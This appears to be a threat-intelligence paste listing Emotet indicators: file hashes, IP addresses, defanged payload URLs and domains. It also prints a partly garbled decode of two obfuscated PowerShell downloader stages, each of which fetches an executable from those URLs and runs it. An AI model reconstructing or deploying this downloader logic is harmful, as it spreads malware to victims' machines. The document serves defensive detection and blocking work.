paladin316

Emotet_Doc_out_2020-09-24_22_54.txt

Sep 24th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 4c01a100f2196b2ac8a43d41f1c9beb894ae460d87f37b2c884850fe5854bf4a
  5. da886aa9c4cf9af28406c6c6b2bd1a84fdca0dd1861259185aba9da512264acf
  6. ab018f08c79d8a8f4335f9fa35e22f6d573ddcf82c5a1db98a8ceb6671bae1b6
  7. a173c80617eccbb5abd724c6c42da5355329ffc94e544185e1401d97c9146964
  8. 741df6ea7d9eff7ced2d6f50bfd469119965326edce722df9f15fc59b97afba3
  9. 241da35fc47abf50c83032be9bdb0df27d81d7d1920055a76b7a84aedeb8a30d
  10. 910452e8c07c66c557c01772883f75fa0890c0e41b8d55b1107360949ccefc71
  11. 418535f82699ce0df10d39ac2798fcce30da6070fb7b9b0f28562d1146f49e69
  12.  
  13.  
  15. IPs (caveat: 104.27.x, 104.28.x and 172.67.x below fall inside Cloudflare's published CDN address ranges, so they are shared edge addresses fronting many unrelated sites rather than actor-owned infrastructure — confirm against the current Cloudflare IP list and prefer blocking the domain/URL instead of these addresses; the remaining addresses are presumably the hosts resolved for the download domains at the time of capture):
  15. 104.27.170.56
  16. 104.27.171.56
  17. 104.28.21.189
  18. 104.28.26.13
  19. 104.28.27.13
  20. 107.180.43.18
  21. 116.202.49.153
  22. 162.241.148.206
  23. 166.62.28.114
  24. 172.67.128.206
  25. 172.67.151.83
  26. 172.67.211.35
  27. 192.185.94.102
  28. 195.201.163.40
  29. 198.211.112.209
  30. 205.144.171.138
  31. 23.229.220.67
  32. 71.185.193.253
  33. 91.121.71.156
  34.  
  35.  
  36.  
  37. URLs (payload download locations used by the two PowerShell stages below; the wp-admin/wp-includes/wp-content paths suggest compromised WordPress sites, so the hosting domains are likely legitimate victims rather than attacker-registered — block the full URL path where the control allows, and expect these to be cleaned up or rotated quickly):
  38. hxxp://h2a1.com/uf8vu/U/
  39. hxxp://www.almakaaseb.com/wp-includes/P/
  40. hxxp://theitnconsultant.com/wp-includes/t/
  41. hxxp://carstarai.com/icon/D/
  42. hxxp://bug.chihuahuamediaprojects.com/wp-includes/u/
  43. hxxps://aecc.dev.caveim.net/wp-admin/dZ/
  44. hxxp://phimsex.2xxhub.com/wp-content/esp/5ur8drbma/6qH/
  45. hxxp://www.firhajshoes.com/wp-admin/RgaiT/
  46. hxxp://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/
  47. hxxp://www.rttutoring.com/wp-includes/LlbY6o/
  48. hxxp://blueskysol.com/sys-cache/2Rk/
  49. hxxp://crazyboxs.com/cgi-bin/IaJ/
  50. hxxp://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/
  51. hxxp://nuhatoys.com/wp-admin/WWA4R/
  52.  
  53.  
  54. Domains:
  55. h2a1.com
  56. www.almakaaseb.com
  57. theitnconsultant.com
  58. carstarai.com
  59. bug.chihuahuamediaprojects.com
  60. aecc.dev.caveim.net
  61. phimsex.2xxhub.com
  62. www.firhajshoes.com
  63. fakeread.com
  64. www.rttutoring.com
  65. blueskysol.com
  66. crazyboxs.com
  67. www.paramedicaleducationguidelines.com
  68. nuhatoys.com
  69.  
  70.  
  71. Decoded Base64 PowerShell (two concatenated stages; the decode is mangled — string quoting and some whitespace are lost and a few bytes are garbled, so this is an analysis artifact, not a runnable script). Each stage: creates a randomly named directory under $env:USERPROFILE, sets SecurityProtocol to tls12/tls11/tls, splits a `*`-delimited list of the URLs above, downloads each with Net.WebClient.DownloadFile to a randomly named .exe in that directory, and on the first download whose saved length is at least 33997 (stage 1) / 21773 (stage 2) bytes executes it with Invoke-Item and breaks; all download errors are swallowed by an empty catch. For hunting: a new <random>\<random>\<random>.exe under a user profile, created by a WINWORD-spawned PowerShell, is the host-side artifact:
  72. <���^,$E5e8mp8=Qvr9gqg;
  73. &new-item $ENV:UsERProfiLE\EXyas68\X_XE08_\ -itemtype dIreCtOrY;
  74. [Net.ServicePointManager]::"sEcU`R`iTY`ProT`oCol" = tls12, tls11, tls;
  75. $Yb4x084 = Qicxrezc;
  76. $Kdtinxb=Aqf3843;
  77. $Ywm_t6r=$env:userprofile{0}Exyas68{0}X_xe08_{0}-f [chAR]92$Yb4x084.exe;
  78. $Mo8n_4q=Bs26mlb;
  79. $Yl_cszo=.new-object NeT.webCLIent;
  80. $Aegp_0c=hxxp://h2a1.com/uf8vu/U/
  81. hxxp://www.almakaaseb.com/wp-includes/P/
  82. hxxp://theitnconsultant.com/wp-includes/t/
  83. hxxp://carstarai.com/icon/D/
  84. hxxp://bug.chihuahuamediaprojects.com/wp-includes/u/
  85. hxxps://aecc.dev.caveim.net/wp-admin/dZ/
  86. hxxp://phimsex.2xxhub.com/wp-content/esp/5ur8drbma/6qH/."sP`lIt"[char]42;
  87. $Bh0lo9j=L6f_a41;
  88. foreach$Mpoikef in $Aegp_0c{try{$Yl_cszo."dOWn`Lo`A`DFiLE"$Mpoikef, $Ywm_t6r;
  89. $I9a2311=Qzg78h1;
  90. If .Get-Item $Ywm_t6r."LeN`gth" -ge 33997 {.Invoke-Item$Ywm_t6r;
  91. $A116qlt=Z9exr4j;
  92. break;
  93. $Htpllnm=Jzz3nbi}}catch{}}$Luacav6=Mw43w0f<���^,$Ehef59i=Zs50d5b;
  94. &new-item $Env:UserpROfIle\I2byDoI\ejo26QD\ -itemtype DIRECtory;
  95. [Net.ServicePointManager]::"S`e`cUri`TyProtOcol" = tls12, tls11, tls;
  96. $F3ysqov = P_lulvp1;
  97. $Mlop803=Fnjkp8o;
  98. $Dglrx5x=$env:userprofile{0}I2bydoi{0}Ejo26qd{0} -f[CHar]92$F3ysqov.exe;
  99. $Ezwvj1m=We7etev;
  100. $Up2imep=&new-object Net.wEbCLient;
  101. $Swkc22m=hxxp://www.firhajshoes.com/wp-admin/RgaiT/
  102. hxxp://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/
  103. hxxp://www.rttutoring.com/wp-includes/LlbY6o/
  104. hxxp://blueskysol.com/sys-cache/2Rk/
  105. hxxp://crazyboxs.com/cgi-bin/IaJ/
  106. hxxp://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/
  107. hxxp://nuhatoys.com/wp-admin/WWA4R/."sPl`IT"[char]42;
  108. $Khmx6rc=Bk7r4jh;
  109. foreach$Ygzxknj in $Swkc22m{try{$Up2imep."DOW`NlO`ADf`iLe"$Ygzxknj, $Dglrx5x;
  110. $Ycf84fz=Zgu3dyf;
  111. If &Get-Item $Dglrx5x."l`enGtH" -ge 21773 {.Invoke-Item$Dglrx5x;
  112. $L7hv3yz=Ct_66pw;
  113. break;
  114. $Uhr0y_j=Oxy8kpo}}catch{}}$Uzmn_sg=Mk1xz8e
  115.  